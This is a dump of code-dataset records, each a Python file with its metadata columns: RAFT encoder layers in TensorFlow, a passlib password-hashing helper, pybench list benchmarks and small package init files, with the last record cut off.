"""Implementation of RAFT."""
# pylint:skip-file
import tensorflow as tf
import tensorflow_addons as tfa
def create_extractor_Conv2d(c_in, c_out, k_size, stride=1):
  """Build a Conv2D layer with RAFT-style variance-scaled initializers.

  The kernel uses a fan-out normal VarianceScaling init (scale 2.0); the bias
  uses a fan-in uniform init whose scale depends on the kernel's fan-in.

  Args:
    c_in: number of input channels (used only to scale the bias initializer).
    c_out: number of output filters.
    k_size: int or (height, width) kernel size.
    stride: convolution stride (default 1).

  Returns:
    A `tf.keras.layers.Conv2D` layer (default padding/activation).
  """
  kernel_scale = 2.0
  # Idiomatic single isinstance check against a tuple of types.
  if isinstance(k_size, (list, tuple)):
    bias_scale = c_out / (3.0 * c_in * k_size[0] * k_size[1])
  else:
    bias_scale = c_out / (3.0 * c_in * k_size * k_size)
  return tf.keras.layers.Conv2D(
      filters=c_out,
      kernel_size=k_size,
      strides=stride,
      kernel_initializer=tf.keras.initializers.VarianceScaling(
          distribution='normal', scale=kernel_scale, mode='fan_out'),
      bias_initializer=tf.keras.initializers.VarianceScaling(
          distribution='uniform', scale=bias_scale, mode='fan_in'))
class ResidualBlock(tf.keras.layers.Layer):
  """RAFT residual block: two padded 3x3 convs plus a skip connection.

  When `stride != 1` the skip path downsamples the input with a strided 1x1
  conv followed by its own normalization layer (`norm3`) so the two branches
  can be summed in `call`.
  """
  def __init__(self, in_planes, planes, norm_fn='batch', stride=1, **kwargs):
    """Creates convs and the normalization layers selected by `norm_fn`.

    Args:
      in_planes: Number of input channels.
      planes: Number of output channels.
      norm_fn: One of 'group', 'batch', 'instance' or 'none'.
      stride: Stride of the first conv (and of the skip-path conv if != 1).

    Raises:
      Exception: If `norm_fn` is not one of the supported strings.
    """
    super(ResidualBlock, self).__init__(**kwargs)
    self.conv1 = create_extractor_Conv2d(
        c_in=in_planes, c_out=planes, k_size=3, stride=stride)
    self.conv2 = create_extractor_Conv2d(c_in=planes, c_out=planes, k_size=3)
    self.relu = tf.keras.layers.ReLU()
    num_groups = planes // 8  # only used by the 'group' variant below
    beta_initializer = 'zeros'
    gamma_initializer = 'ones'
    if norm_fn == 'group':
      self.norm1 = tfa.layers.GroupNormalization(
          groups=num_groups,
          axis=-1,
          epsilon=1e-5,
          beta_initializer=beta_initializer,
          gamma_initializer=gamma_initializer)
      self.norm2 = tfa.layers.GroupNormalization(
          groups=num_groups,
          axis=-1,
          epsilon=1e-5,
          beta_initializer=beta_initializer,
          gamma_initializer=gamma_initializer)
      if stride != 1:
        # norm3 normalizes the downsampled skip path (see downsample below).
        self.norm3 = tfa.layers.GroupNormalization(
            groups=num_groups,
            axis=-1,
            epsilon=1e-5,
            beta_initializer=beta_initializer,
            gamma_initializer=gamma_initializer)
    elif norm_fn == 'batch':
      self.norm1 = tf.keras.layers.BatchNormalization(
          epsilon=1e-5,
          beta_initializer=beta_initializer,
          gamma_initializer=gamma_initializer)
      self.norm2 = tf.keras.layers.BatchNormalization(
          epsilon=1e-5,
          beta_initializer=beta_initializer,
          gamma_initializer=gamma_initializer)
      if stride != 1:
        self.norm3 = tf.keras.layers.BatchNormalization(
            epsilon=1e-5,
            beta_initializer=beta_initializer,
            gamma_initializer=gamma_initializer)
    elif norm_fn == 'instance':
      # center=False/scale=False: no learned affine parameters, so the
      # beta/gamma initializers are effectively inert here.
      self.norm1 = tfa.layers.InstanceNormalization(
          axis=3,
          epsilon=1e-5,
          center=False,
          scale=False,
          beta_initializer=beta_initializer,
          gamma_initializer=gamma_initializer)
      self.norm2 = tfa.layers.InstanceNormalization(
          axis=3,
          epsilon=1e-5,
          center=False,
          scale=False,
          beta_initializer=beta_initializer,
          gamma_initializer=gamma_initializer)
      if stride != 1:
        self.norm3 = tfa.layers.InstanceNormalization(
            axis=3,
            epsilon=1e-5,
            center=False,
            scale=False,
            beta_initializer=beta_initializer,
            gamma_initializer=gamma_initializer)
    elif norm_fn == 'none':
      # An empty Sequential acts as an identity layer.
      self.norm1 = tf.keras.Sequential()
      self.norm2 = tf.keras.Sequential()
      if stride != 1:
        self.norm3 = tf.keras.Sequential()
    else:
      raise Exception('norm_fn %s not implemented' % norm_fn)
    if stride == 1:
      # Identity skip path: shapes already match.
      self.downsample = tf.keras.Sequential()
    else:
      conv = create_extractor_Conv2d(
          c_in=in_planes, c_out=planes, k_size=1, stride=stride)
      self.downsample = tf.keras.Sequential(layers=[conv, self.norm3])
  def call(self, x, training=True):
    """Applies conv->norm->relu twice and adds the (possibly downsampled) input."""
    y = x
    # Explicit symmetric 1-pixel padding for the 3x3 'valid' convs (NHWC).
    paddings = [[0, 0], [1, 1], [1, 1], [0, 0]]
    y = tf.pad(y, paddings)
    y = self.relu(self.norm1(self.conv1(y), training=training))
    y = tf.pad(y, paddings)
    y = self.relu(self.norm2(self.conv2(y), training=training))
    x = self.downsample(x, training=training)
    return self.relu(x + y)
class BottleneckBlock(tf.keras.layers.Layer):
  """RAFT bottleneck block: 1x1 reduce -> 3x3 -> 1x1 expand, plus a skip path.

  The hidden width is `planes // 4`. When `stride != 1` the skip path
  downsamples the input with a strided 1x1 conv followed by `norm4`.
  """
  def __init__(self, in_planes, planes, norm_fn='group', stride=1, **kwargs):
    """Creates the three convs and the normalization layers for `norm_fn`.

    Args:
      in_planes: Number of input channels.
      planes: Number of output channels.
      norm_fn: One of 'group', 'batch', 'instance' or 'none'.
      stride: Stride of the middle 3x3 conv (and of the skip-path conv).

    Raises:
      Exception: If `norm_fn` is not one of the supported strings.
    """
    super(BottleneckBlock, self).__init__(**kwargs)
    hidden_planes = planes // 4
    self.conv1 = create_extractor_Conv2d(
        c_in=in_planes, c_out=hidden_planes, k_size=1)
    self.conv2 = create_extractor_Conv2d(
        c_in=hidden_planes, c_out=hidden_planes, k_size=3, stride=stride)
    self.conv3 = create_extractor_Conv2d(
        c_in=hidden_planes, c_out=planes, k_size=1)
    self.relu = tf.keras.layers.ReLU()
    num_groups = planes // 8  # only used by the 'group' variant below
    beta_initializer = 'zeros'
    gamma_initializer = 'ones'
    if norm_fn == 'group':
      self.norm1 = tfa.layers.GroupNormalization(
          groups=num_groups,
          axis=-1,
          epsilon=1e-5,
          beta_initializer=beta_initializer,
          gamma_initializer=gamma_initializer)
      self.norm2 = tfa.layers.GroupNormalization(
          groups=num_groups,
          axis=-1,
          epsilon=1e-5,
          beta_initializer=beta_initializer,
          gamma_initializer=gamma_initializer)
      self.norm3 = tfa.layers.GroupNormalization(
          groups=num_groups,
          axis=-1,
          epsilon=1e-5,
          beta_initializer=beta_initializer,
          gamma_initializer=gamma_initializer)
      if stride != 1:
        # norm4 normalizes the downsampled skip path (see downsample below).
        self.norm4 = tfa.layers.GroupNormalization(
            groups=num_groups,
            axis=-1,
            epsilon=1e-5,
            beta_initializer=beta_initializer,
            gamma_initializer=gamma_initializer)
    elif norm_fn == 'batch':
      self.norm1 = tf.keras.layers.BatchNormalization(
          epsilon=1e-5,
          beta_initializer=beta_initializer,
          gamma_initializer=gamma_initializer)
      self.norm2 = tf.keras.layers.BatchNormalization(
          epsilon=1e-5,
          beta_initializer=beta_initializer,
          gamma_initializer=gamma_initializer)
      self.norm3 = tf.keras.layers.BatchNormalization(
          epsilon=1e-5,
          beta_initializer=beta_initializer,
          gamma_initializer=gamma_initializer)
      if stride != 1:
        self.norm4 = tf.keras.layers.BatchNormalization(
            epsilon=1e-5,
            beta_initializer=beta_initializer,
            gamma_initializer=gamma_initializer)
    elif norm_fn == 'instance':
      # center=False/scale=False: no learned affine parameters, so the
      # beta/gamma initializers are effectively inert here.
      self.norm1 = tfa.layers.InstanceNormalization(
          axis=3,
          epsilon=1e-5,
          center=False,
          scale=False,
          beta_initializer=beta_initializer,
          gamma_initializer=gamma_initializer)
      self.norm2 = tfa.layers.InstanceNormalization(
          axis=3,
          epsilon=1e-5,
          center=False,
          scale=False,
          beta_initializer=beta_initializer,
          gamma_initializer=gamma_initializer)
      self.norm3 = tfa.layers.InstanceNormalization(
          axis=3,
          epsilon=1e-5,
          center=False,
          scale=False,
          beta_initializer=beta_initializer,
          gamma_initializer=gamma_initializer)
      if stride != 1:
        self.norm4 = tfa.layers.InstanceNormalization(
            axis=3,
            epsilon=1e-5,
            center=False,
            scale=False,
            beta_initializer=beta_initializer,
            gamma_initializer=gamma_initializer)
    elif norm_fn == 'none':
      # An empty Sequential acts as an identity layer.
      self.norm1 = tf.keras.Sequential()
      self.norm2 = tf.keras.Sequential()
      self.norm3 = tf.keras.Sequential()
      if stride != 1:
        self.norm4 = tf.keras.Sequential()
    else:
      raise Exception('norm_fn %s not implemented' % norm_fn)
    if stride == 1:
      # Identity skip path: shapes already match.
      self.downsample = tf.keras.Sequential()
    else:
      conv = create_extractor_Conv2d(
          c_in=in_planes, c_out=planes, k_size=1, stride=stride)
      self.downsample = tf.keras.Sequential(layers=[conv, self.norm4])
  def call(self, x, training=True):
    """Applies the 1x1/3x3/1x1 stack and adds the (possibly downsampled) input."""
    y = x
    # Explicit symmetric 1-pixel padding, needed only before the 3x3 conv2.
    paddings = [[0, 0], [1, 1], [1, 1], [0, 0]]
    y = self.relu(self.norm1(self.conv1(y), training=training))
    y = tf.pad(y, paddings)
    y = self.relu(self.norm2(self.conv2(y), training=training))
    y = self.relu(self.norm3(self.conv3(y), training=training))
    x = self.downsample(x, training=training)
    return self.relu(x + y)
class BasicEncoder(tf.keras.layers.Layer):
  """RAFT basic encoder: strided 7x7 stem plus three residual stages.

  Three stride-2 reductions total (stem + layer2 + layer3), so the output
  spatial resolution is 1/8 of the input.
  """
  def __init__(self, output_dim=128, norm_fn='none', dropout=0.0, **kwargs):
    """Creates the stem, residual stages, output conv and optional dropout.

    Args:
      output_dim: Number of channels of the final 1x1 conv.
      norm_fn: One of 'group', 'batch', 'instance' or 'none'; applied to the
        stem here and forwarded to the ResidualBlocks.
      dropout: Dropout rate after the output conv; 0 disables it.

    Raises:
      Exception: If `norm_fn` is not one of the supported strings.
    """
    super(BasicEncoder, self).__init__(**kwargs)
    self.norm_fn = norm_fn
    beta_initializer = 'zeros'
    gamma_initializer = 'ones'
    if norm_fn == 'group':
      self.norm1 = tfa.layers.GroupNormalization(
          groups=8,
          axis=-1,
          epsilon=1e-5,
          beta_initializer=beta_initializer,
          gamma_initializer=gamma_initializer)
    elif norm_fn == 'batch':
      self.norm1 = tf.keras.layers.BatchNormalization(
          epsilon=1e-5,
          beta_initializer=beta_initializer,
          gamma_initializer=gamma_initializer)
    elif norm_fn == 'instance':
      # center=False/scale=False: no learned affine parameters here.
      self.norm1 = tfa.layers.InstanceNormalization(
          axis=-1,
          epsilon=1e-5,
          center=False,
          scale=False,
          beta_initializer=beta_initializer,
          gamma_initializer=gamma_initializer)
    elif norm_fn == 'none':
      # An empty Sequential acts as an identity layer.
      self.norm1 = tf.keras.Sequential()
    else:
      raise Exception('norm_fn %s not implemented' % norm_fn)
    self.conv1 = create_extractor_Conv2d(c_in=3, c_out=64, k_size=7, stride=2)
    self.relu1 = tf.keras.layers.ReLU()
    self.in_planes = 64  # running input width, advanced by _make_layer
    self.layer1 = self._make_layer(64, stride=1)
    self.layer2 = self._make_layer(96, stride=2)
    self.layer3 = self._make_layer(128, stride=2)
    self.conv2 = create_extractor_Conv2d(c_in=128, c_out=output_dim, k_size=1)
    if dropout > 0:
      self.dropout = tf.keras.layers.Dropout(rate=dropout)
    else:
      # Identity when dropout is disabled, so call() stays unconditional.
      self.dropout = tf.keras.Sequential()
  # initialize according to RAFT
  def _make_layer(self, dim, stride=1):
    """Returns two stacked ResidualBlocks (first may downsample); updates self.in_planes."""
    layer1 = ResidualBlock(self.in_planes, dim, self.norm_fn, stride=stride)
    layer2 = ResidualBlock(dim, dim, self.norm_fn, stride=1)
    layers = [layer1, layer2]
    self.in_planes = dim
    return tf.keras.Sequential(layers=layers)
  def call(self, x, training=True):
    """Maps an NHWC image batch to a 1/8-resolution feature map."""
    # Explicit symmetric 3-pixel padding for the 7x7 'valid' stem conv.
    paddings = [[0, 0], [3, 3], [3, 3], [0, 0]]
    x = tf.pad(x, paddings=paddings)
    x = self.conv1(x)
    x = self.norm1(x, training=training)
    x = self.relu1(x)
    x = self.layer1(x, training=training)
    x = self.layer2(x, training=training)
    x = self.layer3(x, training=training)
    x = self.conv2(x)
    x = self.dropout(x, training=training)
    return x
class SmallEncoder(tf.keras.layers.Layer):
  """RAFT small encoder: strided 7x7 stem plus three bottleneck stages.

  Three stride-2 reductions total, so the output spatial resolution is 1/8
  of the input, with narrower widths than BasicEncoder.
  """
  def __init__(self, output_dim=128, norm_fn='batch', dropout=0.0, **kwargs):
    """Creates the stem, bottleneck stages and output conv.

    Args:
      output_dim: Number of channels of the final 1x1 conv.
      norm_fn: One of 'group', 'batch', 'instance' or 'none'; applied to the
        stem here and forwarded to the BottleneckBlocks.
      dropout: NOTE(review): accepted but never used in this class (unlike
        BasicEncoder) — confirm whether a Dropout layer was intended.

    Raises:
      Exception: If `norm_fn` is not one of the supported strings.
    """
    super(SmallEncoder, self).__init__(**kwargs)
    self.norm_fn = norm_fn
    beta_initializer = 'zeros'
    gamma_initializer = 'ones'
    if norm_fn == 'group':
      self.norm1 = tfa.layers.GroupNormalization(
          groups=8,
          axis=-1,
          epsilon=1e-5,
          beta_initializer=beta_initializer,
          gamma_initializer=gamma_initializer)
    elif norm_fn == 'batch':
      self.norm1 = tf.keras.layers.BatchNormalization(
          epsilon=1e-5,
          beta_initializer=beta_initializer,
          gamma_initializer=gamma_initializer)
    elif norm_fn == 'instance':
      # center=False/scale=False: no learned affine parameters here.
      self.norm1 = tfa.layers.InstanceNormalization(
          axis=-1,
          epsilon=1e-5,
          center=False,
          scale=False,
          beta_initializer=beta_initializer,
          gamma_initializer=gamma_initializer)
    elif norm_fn == 'none':
      # An empty Sequential acts as an identity layer.
      self.norm1 = tf.keras.Sequential()
    else:
      raise Exception('norm_fn %s not implemented' % norm_fn)
    self.conv1 = create_extractor_Conv2d(c_in=3, c_out=32, k_size=7, stride=2)
    self.relu1 = tf.keras.layers.ReLU()
    self.in_planes = 32  # running input width, advanced by _make_layer
    self.layer1 = self._make_layer(32, stride=1)
    self.layer2 = self._make_layer(64, stride=2)
    self.layer3 = self._make_layer(96, stride=2)
    self.conv2 = create_extractor_Conv2d(c_in=96, c_out=output_dim, k_size=1)
  def _make_layer(self, dim, stride=1):
    """Returns two stacked BottleneckBlocks (first may downsample); updates self.in_planes."""
    layer1 = BottleneckBlock(self.in_planes, dim, self.norm_fn, stride=stride)
    layer2 = BottleneckBlock(dim, dim, self.norm_fn, stride=1)
    layers = [layer1, layer2]
    self.in_planes = dim
    return tf.keras.Sequential(layers=layers)
  def call(self, x, training=True):
    """Maps an NHWC image batch to a 1/8-resolution feature map."""
    # Explicit symmetric 3-pixel padding for the 7x7 'valid' stem conv.
    paddings = [[0, 0], [3, 3], [3, 3], [0, 0]]
    x = tf.pad(x, paddings=paddings)
    x = self.conv1(x)
    x = self.norm1(x, training=training)
    x = self.relu1(x)
    x = self.layer1(x, training=training)
    x = self.layer2(x, training=training)
    x = self.layer3(x, training=training)
    x = self.conv2(x)
    return x
| 33.071253
| 78
| 0.643462
| 1,692
| 13,460
| 4.933806
| 0.106974
| 0.104217
| 0.174653
| 0.097029
| 0.849665
| 0.834811
| 0.821155
| 0.781624
| 0.770963
| 0.75012
| 0
| 0.029638
| 0.245468
| 13,460
| 406
| 79
| 33.152709
| 0.79234
| 0.048217
| 0
| 0.81155
| 0
| 0
| 0.021345
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.033435
| false
| 0
| 0.006079
| 0
| 0.072948
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
79354fe3191e9c9186db7af328903a5fdb5ce02f
| 230
|
py
|
Python
|
server/core/passwords.py
|
vgamula/sp
|
16e1dcbf15c1a76d44b15bc914a001167a43c05e
|
[
"MIT"
] | null | null | null |
server/core/passwords.py
|
vgamula/sp
|
16e1dcbf15c1a76d44b15bc914a001167a43c05e
|
[
"MIT"
] | null | null | null |
server/core/passwords.py
|
vgamula/sp
|
16e1dcbf15c1a76d44b15bc914a001167a43c05e
|
[
"MIT"
] | null | null | null |
from passlib.hash import pbkdf2_sha256
def generate_password(password: str) -> str:
    """Return a PBKDF2-SHA256 hash of *password* (salt handled by passlib)."""
    return pbkdf2_sha256.hash(password)
def check_password(password: str, hash: str) -> bool:
    """Return True if *password* matches the stored PBKDF2-SHA256 *hash*.

    NOTE(review): the parameter name ``hash`` shadows the builtin; it is kept
    unchanged here because renaming would break keyword-argument callers.
    """
    return pbkdf2_sha256.verify(password, hash)
| 23
| 53
| 0.76087
| 31
| 230
| 5.483871
| 0.451613
| 0.211765
| 0.223529
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.060914
| 0.143478
| 230
| 9
| 54
| 25.555556
| 0.80203
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 1
| 0.2
| 0.4
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
|
0
| 8
|
f704b34c87ed8874507207d4c03838d31c80bd03
| 113
|
py
|
Python
|
pfdo_med2image/__init__.py
|
FNNDSC/pfdo_med2image
|
f65412aea362d0db5b8e7e2257b1d8fc1e696494
|
[
"Apache-2.0"
] | null | null | null |
pfdo_med2image/__init__.py
|
FNNDSC/pfdo_med2image
|
f65412aea362d0db5b8e7e2257b1d8fc1e696494
|
[
"Apache-2.0"
] | 2
|
2020-08-18T21:47:22.000Z
|
2021-03-12T14:45:35.000Z
|
pfdo_med2image/__init__.py
|
FNNDSC/pfdo_med2image
|
f65412aea362d0db5b8e7e2257b1d8fc1e696494
|
[
"Apache-2.0"
] | 1
|
2020-11-12T21:40:01.000Z
|
2020-11-12T21:40:01.000Z
|
# Prefer the relative import when loaded as part of the package; fall back to
# an absolute import when the module is run outside the package context.
try:
    from .pfdo_med2image import pfdo_med2image
except ImportError:
    # Narrowed from a bare `except:`, which also swallowed unrelated errors
    # (including KeyboardInterrupt) raised while importing the submodule.
    from pfdo_med2image import pfdo_med2image
| 22.6
| 49
| 0.752212
| 14
| 113
| 5.785714
| 0.428571
| 0.641975
| 0.419753
| 0.567901
| 0.888889
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0.045455
| 0.221239
| 113
| 4
| 50
| 28.25
| 0.875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 9
|
f730def843346a0a824d97dd5d8478aa29af6a02
| 114
|
py
|
Python
|
OnlySnarf/src/elements/__init__.py
|
sec-js/onlysnarf
|
c8c32abb5d6b22c08fc7e29b41211530fb583b85
|
[
"MIT"
] | null | null | null |
OnlySnarf/src/elements/__init__.py
|
sec-js/onlysnarf
|
c8c32abb5d6b22c08fc7e29b41211530fb583b85
|
[
"MIT"
] | null | null | null |
OnlySnarf/src/elements/__init__.py
|
sec-js/onlysnarf
|
c8c32abb5d6b22c08fc7e29b41211530fb583b85
|
[
"MIT"
] | null | null | null |
from .driver import ELEMENTS as driverElements
from .profile import ELEMENTS as profileElements
# from . import *
| 28.5
| 48
| 0.807018
| 14
| 114
| 6.571429
| 0.571429
| 0.304348
| 0.347826
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.149123
| 114
| 4
| 49
| 28.5
| 0.948454
| 0.131579
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
f784a638c65898ba4a77de77616d6ae0a116d0bc
| 6,760
|
py
|
Python
|
AppPkg/Applications/Python/Python-2.7.2/Tools/pybench/Lists.py
|
CEOALT1/RefindPlusUDK
|
116b957ad735f96fbb6d80a0ba582046960ba164
|
[
"BSD-2-Clause"
] | 2,757
|
2018-04-28T21:41:36.000Z
|
2022-03-29T06:33:36.000Z
|
AppPkg/Applications/Python/Python-2.7.2/Tools/pybench/Lists.py
|
CEOALT1/RefindPlusUDK
|
116b957ad735f96fbb6d80a0ba582046960ba164
|
[
"BSD-2-Clause"
] | 20
|
2019-07-23T15:29:32.000Z
|
2022-01-21T12:53:04.000Z
|
AppPkg/Applications/Python/Python-2.7.2/Tools/pybench/Lists.py
|
CEOALT1/RefindPlusUDK
|
116b957ad735f96fbb6d80a0ba582046960ba164
|
[
"BSD-2-Clause"
] | 449
|
2018-05-09T05:54:05.000Z
|
2022-03-30T14:54:18.000Z
|
from pybench import Test
class SimpleListManipulation(Test):
    """pybench: time basic list appends, index writes and index reads.

    The loop body is deliberately unrolled 5 times (reflected in
    ``operations``); do not refactor the repetition away — it is exactly
    what this benchmark measures.
    """
    version = 2.0
    # 5 unrolled groups of (6 appends + 6 index writes + 6 index reads).
    operations = 5* (6 + 6 + 6)
    rounds = 130000
    def test(self):
        """Timed body: repeated append/setitem/getitem on a plain list."""
        l = []
        append = l.append  # hoist the bound method out of the loop
        for i in xrange(self.rounds):
            # --- unrolled group 1 of 5 ---
            append(2)
            append(3)
            append(4)
            append(2)
            append(3)
            append(4)
            l[0] = 3
            l[1] = 4
            l[2] = 5
            l[3] = 3
            l[4] = 4
            l[5] = 5
            x = l[0]
            x = l[1]
            x = l[2]
            x = l[3]
            x = l[4]
            x = l[5]
            # --- unrolled group 2 of 5 ---
            append(2)
            append(3)
            append(4)
            append(2)
            append(3)
            append(4)
            l[0] = 3
            l[1] = 4
            l[2] = 5
            l[3] = 3
            l[4] = 4
            l[5] = 5
            x = l[0]
            x = l[1]
            x = l[2]
            x = l[3]
            x = l[4]
            x = l[5]
            # --- unrolled group 3 of 5 ---
            append(2)
            append(3)
            append(4)
            append(2)
            append(3)
            append(4)
            l[0] = 3
            l[1] = 4
            l[2] = 5
            l[3] = 3
            l[4] = 4
            l[5] = 5
            x = l[0]
            x = l[1]
            x = l[2]
            x = l[3]
            x = l[4]
            x = l[5]
            # --- unrolled group 4 of 5 ---
            append(2)
            append(3)
            append(4)
            append(2)
            append(3)
            append(4)
            l[0] = 3
            l[1] = 4
            l[2] = 5
            l[3] = 3
            l[4] = 4
            l[5] = 5
            x = l[0]
            x = l[1]
            x = l[2]
            x = l[3]
            x = l[4]
            x = l[5]
            # --- unrolled group 5 of 5 ---
            append(2)
            append(3)
            append(4)
            append(2)
            append(3)
            append(4)
            l[0] = 3
            l[1] = 4
            l[2] = 5
            l[3] = 3
            l[4] = 4
            l[5] = 5
            x = l[0]
            x = l[1]
            x = l[2]
            x = l[3]
            x = l[4]
            x = l[5]
            if len(l) > 10000:
                # cut down the size
                del l[:]
    def calibrate(self):
        """Overhead-only pass: same loop and setup, empty body."""
        l = []
        append = l.append
        for i in xrange(self.rounds):
            pass
class ListSlicing(Test):
    """pybench: time list slice reads and slice assignments."""
    version = 2.0
    # 25 inner iterations of (3 reads + 1 assignment + 2 reads + 1 assignment).
    operations = 25*(3+1+2+1)
    rounds = 800
    def test(self):
        """Timed body: slicing a fresh 100-element copy per round."""
        n = range(100)
        r = range(25)
        for i in xrange(self.rounds):
            l = n[:]  # fresh copy so slice assignments don't accumulate
            for j in r:
                m = l[50:]
                m = l[:25]
                m = l[50:55]
                l[:3] = n
                m = l[:-1]
                m = l[1:]
                l[-1:] = n
    def calibrate(self):
        """Overhead-only pass: same nested loops, empty body."""
        n = range(100)
        r = range(25)
        for i in xrange(self.rounds):
            for j in r:
                pass
class SmallLists(Test):
    """pybench: time creating and manipulating many small lists.

    The body is deliberately unrolled 5 times (reflected in ``operations``);
    do not refactor the repetition away — it is what is being measured.
    """
    version = 2.0
    # 5 unrolled groups of (1 create + 6 appends + 6 writes + 3 slice ops + 1).
    operations = 5*(1+ 6 + 6 + 3 + 1)
    rounds = 80000
    def test(self):
        """Timed body: build a small list, index-write, slice-read/write."""
        for i in xrange(self.rounds):
            # --- unrolled group 1 of 5 ---
            l = []
            append = l.append
            append(2)
            append(3)
            append(4)
            append(2)
            append(3)
            append(4)
            l[0] = 3
            l[1] = 4
            l[2] = 5
            l[3] = 3
            l[4] = 4
            l[5] = 5
            l[:3] = [1,2,3]
            m = l[:-1]
            m = l[1:]
            l[-1:] = [4,5,6]
            # --- unrolled group 2 of 5 ---
            l = []
            append = l.append
            append(2)
            append(3)
            append(4)
            append(2)
            append(3)
            append(4)
            l[0] = 3
            l[1] = 4
            l[2] = 5
            l[3] = 3
            l[4] = 4
            l[5] = 5
            l[:3] = [1,2,3]
            m = l[:-1]
            m = l[1:]
            l[-1:] = [4,5,6]
            # --- unrolled group 3 of 5 ---
            l = []
            append = l.append
            append(2)
            append(3)
            append(4)
            append(2)
            append(3)
            append(4)
            l[0] = 3
            l[1] = 4
            l[2] = 5
            l[3] = 3
            l[4] = 4
            l[5] = 5
            l[:3] = [1,2,3]
            m = l[:-1]
            m = l[1:]
            l[-1:] = [4,5,6]
            # --- unrolled group 4 of 5 ---
            l = []
            append = l.append
            append(2)
            append(3)
            append(4)
            append(2)
            append(3)
            append(4)
            l[0] = 3
            l[1] = 4
            l[2] = 5
            l[3] = 3
            l[4] = 4
            l[5] = 5
            l[:3] = [1,2,3]
            m = l[:-1]
            m = l[1:]
            l[-1:] = [4,5,6]
            # --- unrolled group 5 of 5 ---
            l = []
            append = l.append
            append(2)
            append(3)
            append(4)
            append(2)
            append(3)
            append(4)
            l[0] = 3
            l[1] = 4
            l[2] = 5
            l[3] = 3
            l[4] = 4
            l[5] = 5
            l[:3] = [1,2,3]
            m = l[:-1]
            m = l[1:]
            l[-1:] = [4,5,6]
    def calibrate(self):
        """Overhead-only pass: same loop, empty body."""
        for i in xrange(self.rounds):
            pass
class SimpleListComprehensions(Test):
    """pybench: time single-loop list comprehensions (plain and filtered)."""
    version = 2.0
    operations = 6
    rounds = 20000
    def test(self):
        """Timed body: 6 comprehensions over a 100-element list per round."""
        n = range(10) * 10
        for i in xrange(self.rounds):
            l = [x for x in n]
            l = [x for x in n if x]
            l = [x for x in n if not x]
            l = [x for x in n]
            l = [x for x in n if x]
            l = [x for x in n if not x]
    def calibrate(self):
        """Overhead-only pass: same loop and setup, empty body."""
        n = range(10) * 10
        for i in xrange(self.rounds):
            pass
class NestedListComprehensions(Test):
    """pybench: time two-loop (nested) list comprehensions, with filters."""
    version = 2.0
    operations = 6
    rounds = 20000
    def test(self):
        """Timed body: 6 nested comprehensions over 10x10 iterations per round."""
        m = range(10)
        n = range(10)
        for i in xrange(self.rounds):
            l = [x for x in n for y in m]
            l = [y for x in n for y in m]
            l = [x for x in n for y in m if y]
            l = [y for x in n for y in m if x]
            l = [x for x in n for y in m if not y]
            l = [y for x in n for y in m if not x]
    def calibrate(self):
        """Overhead-only pass: same loop and setup, empty body."""
        m = range(10)
        n = range(10)
        for i in xrange(self.rounds):
            pass
| 19.259259
| 51
| 0.282544
| 849
| 6,760
| 2.249706
| 0.064782
| 0.035602
| 0.136126
| 0.146597
| 0.857592
| 0.835602
| 0.797382
| 0.781152
| 0.748691
| 0.748691
| 0
| 0.131481
| 0.600592
| 6,760
| 350
| 52
| 19.314286
| 0.575926
| 0.002515
| 0
| 0.901515
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.037879
| false
| 0.018939
| 0.003788
| 0
| 0.117424
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
f78b1040174ae98cbff44eed7607ab91bf938b9d
| 171
|
py
|
Python
|
rl/action/__init__.py
|
tomasruizt/Reinforcement-Learning
|
b8a01b08c1086da3c972846d3b038e233189103f
|
[
"Apache-2.0"
] | 3
|
2018-01-16T19:26:17.000Z
|
2018-02-06T19:38:04.000Z
|
rl/action/__init__.py
|
tomasruizt/Reinforcement-Learning
|
b8a01b08c1086da3c972846d3b038e233189103f
|
[
"Apache-2.0"
] | null | null | null |
rl/action/__init__.py
|
tomasruizt/Reinforcement-Learning
|
b8a01b08c1086da3c972846d3b038e233189103f
|
[
"Apache-2.0"
] | null | null | null |
from rl.action.discrete_action import DiscreteAction
from rl.action.action_features import DiscreteActionFeatures
from rl.action.action_scores import DiscreteActionScores
| 42.75
| 60
| 0.894737
| 21
| 171
| 7.142857
| 0.47619
| 0.12
| 0.24
| 0.24
| 0
| 0
| 0
| 0
